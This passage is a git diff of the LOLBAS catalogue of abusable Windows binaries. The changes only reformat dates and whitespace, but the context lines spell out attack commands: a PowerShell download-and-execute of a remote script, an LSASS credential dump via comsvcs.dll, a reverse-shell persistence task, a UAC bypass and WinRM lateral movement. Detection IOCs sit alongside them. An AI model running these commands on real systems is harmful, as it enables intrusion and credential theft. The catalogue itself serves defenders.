C:\Windows\System32\rundll32.exe - Path: C:\Windows\SysWOW64\rundll32.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: diff --git a/yml/OSBinaries/Runonce.yml b/yml/OSBinaries/Runonce.yml index f317e7d..c053430 100644 --- a/yml/OSBinaries/Runonce.yml +++ b/yml/OSBinaries/Runonce.yml @@ -1,8 +1,8 @@ --- Name: Runonce.exe -Description: +Description: Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Runonce.exe /AlternateShellStartup Description: Executes a Run Once Task that has been configured in the registry @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\runonce.exe - Path: C:\Windows\SysWOW64\runonce.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY 
@@ -25,4 +25,4 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml index 2b62f1a..ddcdd0e 100644 --- a/yml/OSBinaries/Runscripthelper.yml +++ b/yml/OSBinaries/Runscripthelper.yml @@ -1,8 +1,8 @@ --- Name: Runscripthelper.exe -Description: +Description: Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test Description: Execute the PowerShell script named test.txt @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Event 4014 - Powershell logging @@ -25,4 +25,4 @@ Resources: Acknowledgement: - Person: Matt Graeber Handle: '@mattifestation' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Sc.yml b/yml/OSBinaries/Sc.yml index 5eabd4d..c0cd856 100644 --- a/yml/OSBinaries/Sc.yml +++ b/yml/OSBinaries/Sc.yml @@ -2,12 +2,12 @@ Name: Sc.exe Description: Used by Windows to manage services Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice Description: Creates a new service and executes the file stored in the ADS. Usecase: Execute binary file hidden inside an alternate data stream - Category: ADS + Category: ADS Privileges: User MitreID: T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096 
@@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\sc.exe - Path: C:\Windows\SysWOW64\sc.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Services that gets created @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml index f9d99df..5be6e5b 100644 --- a/yml/OSBinaries/Schtasks.yml +++ b/yml/OSBinaries/Schtasks.yml @@ -2,12 +2,12 @@ Name: Schtasks.exe Description: Schedule periodic tasks Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe Description: Create a recurring task to execute every minute. Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive - Category: Execute + Category: Execute Privileges: User MitreID: T1053 MitreLink: https://attack.mitre.org/wiki/Technique/T1053 @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: c:\windows\system32\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Services that gets created @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Handle: ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml index 3aaf782..e15a8aa 100644 --- a/yml/OSBinaries/Scriptrunner.yml +++ b/yml/OSBinaries/Scriptrunner.yml @@ -1,8 +1,8 @@ --- Name: Scriptrunner.exe -Description: +Description: Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Scriptrunner.exe -appvscript calc.exe Description: Executes calc.exe @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\scriptrunner.exe - Path: C:\Windows\SysWOW64\scriptrunner.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Scriptrunner.exe should not be in use unless App-v is deployed 
@@ -34,4 +34,4 @@ Resources: Acknowledgement: - Person: Nick Tyrer Handle: '@nicktyrer' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index 2822c69..e2748cf 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml @@ -2,7 +2,7 @@ Name: SyncAppvPublishingServer.exe Description: Used by App-v to get App-v server lists Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" Description: Example command on how inject Powershell code into the process @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Nick Landers Handle: '@monoxgas' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index 124ea50..5334731 100644 --- a/yml/OSBinaries/Ttdinject.yml +++ b/yml/OSBinaries/Ttdinject.yml @@ -2,7 +2,7 @@ Name: Ttdinject.exe Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe) Author: 'Maxime Nadeau' -Created: '2020-05-12' +Created: 2020-05-12 Commands: - Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe" Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. 
@@ -23,9 +23,9 @@ Commands: Full_Path: - Path: C:\Windows\System32\ttdinject.exe - Path: C:\Windows\Syswow64\ttdinject.exe -Code_Sample: - - Code: -Detection: +Code_Sample: + - Code: +Detection: - IOC: Parent child relationship. Ttdinject.exe parent for executed command - IOC: Multiple queries made to the IFEO registry key of an untrusted executable (Ex. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\payload.exe") from the ttdinject.exe process Resources: diff --git a/yml/OSBinaries/Tttracer.yml b/yml/OSBinaries/Tttracer.yml index e7e6a1d..9d66c6c 100644 --- a/yml/OSBinaries/Tttracer.yml +++ b/yml/OSBinaries/Tttracer.yml @@ -2,7 +2,7 @@ Name: Tttracer.exe Description: Used by Windows 1809 and newer to Debug Time Travel Author: 'Oddvar Moe' -Created: '2019-11-5' +Created: 2019-11-05 Commands: - Command: tttracer.exe C:\windows\system32\calc.exe Description: Execute calc using tttracer.exe. Requires administrator privileges @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\tttracer.exe - Path: C:\Windows\SysWOW64\tttracer.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Parent child relationship. Tttracer parent for executed command diff --git a/yml/OSBinaries/Vbc.yml b/yml/OSBinaries/Vbc.yml index 4e95905..523915c 100644 --- a/yml/OSBinaries/Vbc.yml +++ b/yml/OSBinaries/Vbc.yml @@ -2,7 +2,7 @@ Name: vbc.exe Description: Binary file used for compile vbs code Author: Lior Adar -Created: 27/02/2020 +Created: 2020-02-27 Commands: - Command: vbc.exe /target:exe c:\temp\vbs\run.vb Description: Binary file used by .NET to compile vb code to .exe @@ -11,7 +11,7 @@ Commands: Privileges: User MitreID: T1127 MitreLink: https://attack.mitre.org/techniques/T1127/ - OperatingSystem: Windows 10,7 + OperatingSystem: Windows 10,7 - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb Description: Description of the second command Usecase: A description of the usecase 
@@ -19,11 +19,11 @@ Commands: Privileges: User MitreID: T1127 MitreLink: https://attack.mitre.org/techniques/T1127/ - OperatingSystem: Windows 10,7 + OperatingSystem: Windows 10,7 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe -Code_Sample: +Code_Sample: - Code: Acknowledgement: - Person: Lior Adar diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml index 87be396..c05d411 100644 --- a/yml/OSBinaries/Verclsid.yml +++ b/yml/OSBinaries/Verclsid.yml @@ -1,8 +1,8 @@ --- Name: Verclsid.exe -Description: +Description: Author: '@bohops' -Created: '2018-12-04' +Created: 2018-12-04 Commands: - Command: verclsid.exe /S /C {CLSID} Description: Used to verify a COM object before it is instantiated by Windows Explorer @@ -15,10 +15,10 @@ Commands: Full_Path: - Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe -Code_Sample: +Code_Sample: - Code: Detection: - - IOC: + - IOC: Resources: - Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 - Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ diff --git a/yml/OSBinaries/Wab.yml b/yml/OSBinaries/Wab.yml index c45c6e0..0022bc9 100644 --- a/yml/OSBinaries/Wab.yml +++ b/yml/OSBinaries/Wab.yml @@ -2,7 +2,7 @@ Name: Wab.exe Description: Windows address book manager Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: wab.exe Description: Change HKLM\Software\Microsoft\WAB\DLLPath and execute DLL of choice @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Program Files\Windows Mail\wab.exe - Path: C:\Program Files (x86)\Windows Mail\wab.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: WAB.exe should normally never be used @@ -25,4 +25,4 @@ Resources: Acknowledgement: - Person: Adam Handle: '@Hexacorn' ---- \ No newline at end of file +--- 
diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index 9109336..7d80d70 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -2,7 +2,7 @@ Name: Wmic.exe Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: wmic.exe process call create "c:\ads\file.txt:program.exe" Description: Execute a .EXE file stored as an Alternate Data Stream (ADS) @@ -71,7 +71,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\wbem\wmic.exe - Path: C:\Windows\SysWOW64\wbem\wmic.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Wmic getting scripts from remote system @@ -82,4 +82,4 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Wscript.yml b/yml/OSBinaries/Wscript.yml index 4992690..12eb0f5 100644 --- a/yml/OSBinaries/Wscript.yml +++ b/yml/OSBinaries/Wscript.yml @@ -2,7 +2,7 @@ Name: Wscript.exe Description: Used by Windows to execute scripts Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: wscript c:\ads\file.txt:script.vbs Description: Execute script stored in an alternate data stream @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\wscript.exe - Path: C:\Windows\SysWOW64\wscript.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Wscript.exe executing code from alternate data streams @@ -34,4 +34,4 @@ Acknowledgement: Handle: '@oddvarmoe' - Person: SaiLay(valen) Handle: '@404death' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Wsreset.yml b/yml/OSBinaries/Wsreset.yml index 9a1cbdd..84edaf6 100644 --- a/yml/OSBinaries/Wsreset.yml +++ b/yml/OSBinaries/Wsreset.yml 
@@ -2,11 +2,11 @@ Name: Wsreset.exe Description: Used to reset Windows Store settings according to its manifest file Author: 'Oddvar Moe' -Created: '2019-03-18' +Created: 2019-03-18 Commands: - Command: wsreset.exe - Description: During startup, wsreset.exe checks the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command for the command to run. Binary will be executed as a high-integrity process without a UAC prompt being displayed to the user. - Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. + Description: During startup, wsreset.exe checks the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command for the command to run. Binary will be executed as a high-integrity process without a UAC prompt being displayed to the user. + Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. Category: UAC bypass Privileges: User MitreID: T1088 @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\wsreset.exe Code Sample: - - Code: + - Code: Detection: - IOC: wsreset.exe launching child process other than mmc.exe - IOC: Creation or modification of the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command diff --git a/yml/OSBinaries/Wuauclt.yml b/yml/OSBinaries/Wuauclt.yml index ba02158..b7d3d1f 100644 --- a/yml/OSBinaries/Wuauclt.yml +++ b/yml/OSBinaries/Wuauclt.yml @@ -2,7 +2,7 @@ Name: wuauclt.exe Description: Windows Update Client Author: 'David Middlehurst' -Created: '2020-09-23' +Created: 2020-09-23 Commands: - Command: wuauclt.exe /UpdateDeploymentProvider /RunHandlerComServer Description: Full_Path_To_DLL would be the abosolute path to .DLL file and would execute code on attach. 
@@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows 10 Full_Path: - Path: C:\Windows\System32\wuauclt.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: wuauclt run with a parameter of a DLL path diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index 5d95a19..6f48fef 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -1,8 +1,8 @@ --- Name: Xwizard.exe -Description: +Description: Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} Description: Xwizard.exe running a custom class that has been added to the registry. @@ -31,10 +31,10 @@ Commands: Full_Path: - Path: C:\Windows\System32\xwizard.exe - Path: C:\Windows\SysWOW64\xwizard.exe -Code_Sample: +Code_Sample: - Code: Detection: - - IOC: + - IOC: Resources: - Link: http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ - Link: https://www.youtube.com/watch?v=LwDHX7DVHWU diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index b661e63..86c8788 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -2,7 +2,7 @@ Name: Advpack.dll Description: Utility for installing software and drivers with rundll32.exe Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). @@ -64,4 +64,4 @@ Acknowledegment: Handle: '@moriarty_meng' - Person: Nick Carr (Threat Intel) Handle: '@ItsReallyNick' ---- \ No newline at end of file +--- diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index 8e071a1..93492cd 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml 
@@ -2,7 +2,7 @@ Name: Ieadvpack.dll Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll. Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 3d9fea5..ab4068c 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -2,7 +2,7 @@ Name: Ieaframe.dll Description: Internet Browser DLL for translating HTML code. Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml index 94f8df8..9866975 100644 --- a/yml/OSLibraries/Mshtml.yml +++ b/yml/OSLibraries/Mshtml.yml @@ -2,7 +2,7 @@ Name: Mshtml.dll Description: Microsoft HTML Viewer Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box). diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml index 7b4286b..35c726a 100644 --- a/yml/OSLibraries/Pcwutl.yml +++ b/yml/OSLibraries/Pcwutl.yml @@ -2,7 +2,7 @@ Name: Pcwutl.dll Description: Microsoft HTML Viewer Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe Description: Launch executable by calling the LaunchApplication function. @@ -25,4 +25,4 @@ Resources: Acknowledgement: - Person: Matt harr0ey Handle: '@harr0ey' ---- \ No newline at end of file +--- 
diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index 85241a5..06ab00e 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -2,7 +2,7 @@ Name: Setupapi.dll Description: Windows Setup Application Programming Interface Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). @@ -43,4 +43,4 @@ Acknowledgement: Handle: '@subTee' - Person: Nick Carr (Threat Intel) Handle: '@ItsReallyNick' ---- \ No newline at end of file +--- diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index b02158f..7e006cf 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -2,7 +2,7 @@ Name: Shdocvw.dll Description: Shell Doc Object and Control Library. Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index d41c301..7231311 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml @@ -2,7 +2,7 @@ Name: Shell32.dll Description: Windows Shell Common Dll Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll Description: Launch a DLL payload by calling the Control_RunDLL function. diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml index 802cbd5..fffd442 100644 --- a/yml/OSLibraries/Syssetup.yml +++ b/yml/OSLibraries/Syssetup.yml 
@@ -2,7 +2,7 @@ Name: Syssetup.dll Description: Windows NT System Setup Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). @@ -41,4 +41,4 @@ Acknowledgement: Handle: '@harr0ey' - Person: Jimmy (Scriptlet) Handle: '@bohops' ---- \ No newline at end of file +--- diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index 15be3a5..5b82185 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml @@ -2,7 +2,7 @@ Name: Url.dll Description: Internet Shortcut Shell Extension DLL. Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta" Description: Launch a HTML application payload by calling OpenURL. diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml index 963e7b4..a22a8a7 100644 --- a/yml/OSLibraries/Zipfldr.yml +++ b/yml/OSLibraries/Zipfldr.yml @@ -2,7 +2,7 @@ Name: Zipfldr.dll Description: Compressed Folder library Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe Description: Launch an executable payload by calling RouteTheCall. diff --git a/yml/OSLibraries/comsvcs.yml b/yml/OSLibraries/comsvcs.yml index a4f8f1e..3a010f9 100644 --- a/yml/OSLibraries/comsvcs.yml +++ b/yml/OSLibraries/comsvcs.yml 
@@ -2,10 +2,10 @@ Name: Comsvcs.dll Description: COM+ Services Author: -Created: '2019-08-30' +Created: 2019-08-30 Commands: - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full" - Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump. + Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump. Usecase: Dump Lsass.exe process memory to retrieve credentials. Category: Dump Privileges: SYSTEM @@ -22,5 +22,5 @@ Resources: - Link: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ Acknowledgement: - Person: modexp - Handle: ---- \ No newline at end of file + Handle: +--- diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index 1916397..d0e409a 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -2,7 +2,7 @@ Name: CL_Mutexverifiers.ps1 Description: Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1 Description: Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable. @@ -18,7 +18,7 @@ Full_Path: - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Video\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Speech\CL_Mutexverifiers.ps1 -Code_Sample: +Code_Sample: - Code: Detection: - IOC: @@ -27,4 +27,4 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- \ No newline at end of file +--- diff --git a/yml/OSScripts/Cl_invocation.yml b/yml/OSScripts/Cl_invocation.yml index 07cf235..a7239dd 100644 --- a/yml/OSScripts/Cl_invocation.yml +++ b/yml/OSScripts/Cl_invocation.yml 
@@ -2,7 +2,7 @@ Name: CL_Invocation.ps1 Description: Aero diagnostics script Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1 \nSyncInvoke [args] Description: Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable. @@ -16,15 +16,15 @@ Full_Path: - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1 -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Resources: - - Link: + - Link: Acknowledgement: - Person: Jimmy Handle: '@bohops' - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- \ No newline at end of file +--- diff --git a/yml/OSScripts/Manage-bde.yml b/yml/OSScripts/Manage-bde.yml index d5a8a4d..ded37dd 100644 --- a/yml/OSScripts/Manage-bde.yml +++ b/yml/OSScripts/Manage-bde.yml @@ -2,7 +2,7 @@ Name: Manage-bde.wsf Description: Script for managing BitLocker Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf Description: Set the comspec variable to another executable prior to calling manage-bde.wsf for execution. @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\System32\manage-bde.wsf -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Manage-bde.wsf should normally not be invoked by a user diff --git a/yml/OSScripts/Pubprn.yml b/yml/OSScripts/Pubprn.yml index 84215d7..324cadc 100644 --- a/yml/OSScripts/Pubprn.yml +++ b/yml/OSScripts/Pubprn.yml 
@@ -2,7 +2,7 @@ Name: Pubprn.vbs Description: Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct Description: Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs - Path: C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs -Code_Sample: +Code_Sample: - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Pubprn_calc.sct Detection: - IOC: @@ -26,4 +26,4 @@ Resources: Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' ---- \ No newline at end of file +--- diff --git a/yml/OSScripts/Syncappvpublishingserver.yml b/yml/OSScripts/Syncappvpublishingserver.yml index f8f6dd0..7e6217c 100644 --- a/yml/OSScripts/Syncappvpublishingserver.yml +++ b/yml/OSScripts/Syncappvpublishingserver.yml @@ -2,7 +2,7 @@ Name: Syncappvpublishingserver.vbs Description: Script used related to app-v and publishing server Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" Description: Inject PowerShell script code with the provided arguments @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows 10 Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs -Code_Sample: +Code_Sample: - Code: Detection: - IOC: @@ -26,4 +26,4 @@ Acknowledgement: Handle: '@monoxgas' - Person: Casey Smith Handle: '@subtee' ---- \ No newline at end of file +--- diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index d2ea85e..372b29d 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml 
@@ -2,7 +2,7 @@ Name: winrm.vbs Description: Script used for manage Windows RM settings Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985' Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol @@ -31,7 +31,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\winrm.vbs - Path: C:\Windows\SysWOW64\winrm.vbs -Code_Sample: +Code_Sample: - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct Detection: diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index 56d8193..13bd368 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml @@ -2,7 +2,7 @@ Name: Pester.bat Description: Used as part of the Powershell pester Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Pester.bat [/help|?|-?|/?] "$null; notepad" Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat -Code_Sample: +Code_Sample: - Code: Detection: - IOC: @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Emin Atac Handle: '@p0w3rsh3ll' ---- \ No newline at end of file +--- diff --git a/yml/OtherMSBinaries/Agentexecutor.yml b/yml/OtherMSBinaries/Agentexecutor.yml index 23850c1..544ff1b 100644 --- a/yml/OtherMSBinaries/Agentexecutor.yml +++ b/yml/OtherMSBinaries/Agentexecutor.yml 
